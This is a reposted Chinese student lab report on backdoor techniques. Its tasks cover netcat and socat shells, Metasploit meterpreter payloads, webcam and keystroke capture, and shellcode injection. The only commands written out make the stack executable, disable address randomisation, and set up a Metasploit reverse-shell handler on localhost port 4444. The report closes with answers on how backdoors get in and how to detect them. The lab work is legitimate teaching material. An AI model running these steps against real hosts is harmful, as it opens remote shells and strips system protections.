其他分享
首页 > 其他分享> > 2019-2020-2 网络对抗技术 20175206李得琛 Exp2 后门原理与实践

2019-2020-2 网络对抗技术 20175206李得琛 Exp2 后门原理与实践

作者:互联网

目录

实践内容

任务一:使用netcat获取主机操作Shell,cron启动
任务二:使用socat获取主机操作Shell, 任务计划启动
任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

准备工作

Windows获得Linux Shell

Linux获得Windows Shell

使用nc传输数据

实践过程

任务一:使用netcat获取主机操作Shell,cron启动

任务二:使用socat获取主机操作Shell, 任务计划启动

任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

execstack -s 20175206pwn   //设置堆栈可执行
execstack -q 20175206pwn  //查询文件的堆栈是否可执行
more /proc/sys/kernel/randomize_va_space   //查看地址随机化的状态
echo "0" > /proc/sys/kernel/randomize_va_space  //关闭地址随机化

use exploit/multi/handler 
set payload linux/x86/shell_reverse_tcp 
set LHOST 127.0.0.1 
set LPORT 4444(代码规定)
show options 
exploit

实践问题

基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?
打开钓鱼链接,打开钓鱼邮件等
在不被信任的网站上下载东西(如图片,视频,应用程序等等),在程序运行的同时,后门可能已经被植入自己的电脑
(2)例举你知道的后门如何启动起来(win及linux)的方式?
在之前学习信息安全技术的实验课中,曾经安装过一个远程操控系统,其与应用程序、图片等绑定,在打开图片或运行程序的同时,该后门程序已经安装到用户主机当中,其在自启动项,注册表,以及进程线程中均有体现。与此同时还有相应的文件进入系统文件当中互相保护,极难被查出
(3)Meterpreter有哪些给你映像深刻的功能?
摄像头的控制,键盘摄入的控制让个人信息被泄露,甚至祸及周边亲人朋友。不法分子极有可能利用这些信息对用户进行诈骗勒索等犯罪举动,其危害程度之深显而易见
(4)如何发现自己有系统有没有被安装后门?
经常使用杀毒软件查杀,更新病毒库
查看注册表,自启动项,进程和线程(线程需要特定应用程序进行监视),对可疑的行为及时终止
开启端口监控,时常对端口接收的信息进行过滤,对陌生端口的突然开放要多加注意,关闭不使用的端口

实验总结与体会

标签:后门,Shell,Windows,Exp2,socat,主机,2020,5206,2019
来源: https://www.cnblogs.com/ldc175206/p/12542513.html